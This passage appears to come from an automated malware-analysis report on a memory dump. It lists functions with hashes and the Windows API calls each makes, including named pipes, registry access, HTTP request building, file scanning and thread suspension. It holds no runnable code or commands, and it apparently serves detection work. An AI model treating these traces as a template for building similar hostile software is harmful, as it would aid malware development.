  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
